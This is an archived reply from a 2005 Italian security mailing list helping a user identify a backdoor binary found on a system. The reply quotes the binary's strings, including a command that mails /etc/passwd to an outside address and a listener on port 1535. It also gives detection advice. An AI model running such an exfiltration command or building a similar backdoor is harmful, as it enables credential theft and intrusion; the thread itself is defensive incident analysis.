Re: [ml] backdoor

[ Home | Liste | F.A.Q. | Risorse | Cerca... ]

[ Data: precedente | successivo | indice ] [ Argomento: precedente | successivo | indice ]

Archivio: Novembre 2005 ml@sikurezza.org
Soggetto: Re: [ml] backdoor
Mittente: Daniele Palumbo
Data: Wed,  9 Nov 2005 15:20:29 +0100 (CET)

Alle 13:20, mercoledÃ 9 novembre 2005, Marco Bertorello ha scritto:
> E' un file binario eseguibile e con strings s'Ã rivelato essere una
> backdoor, perÃ non trovo informazioni su che tipo di backdoor sia e che
> cosa faccia (a parte spedire ad un indirizzo email il passwd[1]).

lo vedi proprio alla fine del tuo allegato:
---
USAGE: %s [PORT=1535]
:: Starting backdoor daemon ::
cat /etc/passwd|mail -s '0wnz4ever 1535' elzorg@xxxxxxxxx
socket
setsockopt
bind
listen
getsockname
Listening to port %d
FUCK: Can't fork child (%d)
:: Done, pid=%d ::
klogd
P554 SMTP 
0wnz4ever
500 Error: bad syntax
.:: #rohack GROUP ::.
.:: Do not distrubute ::.
.:: by Zorg & seby_` ::.
---

cerca per processi in ascolto sulla porta 1535, o fai anche un portscan 
generico.
senza lo shadow, ma con una shell aperta, puÃ fare molto :)

tra l'altro, non Ã detto che abbia giÃ avuto accesso all'utente root.

bye
d.

In risposta a:
- [ml] backdoor, Marco Bertorello

Data:
- precedente: Re: [ml] Reverse DNS, Marco
- successivo: [ml] Autenticazione Router tramite CiscoSecure, Alessandro Feltrin
- indice

Argomento:
- precedente: Re: [ml] backdoor, Luca Memini
- successivo: Re: [ml] backdoor, ascii
- indice

[ Home | Liste | F.A.Q. | Risorse | Cerca... ]

www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005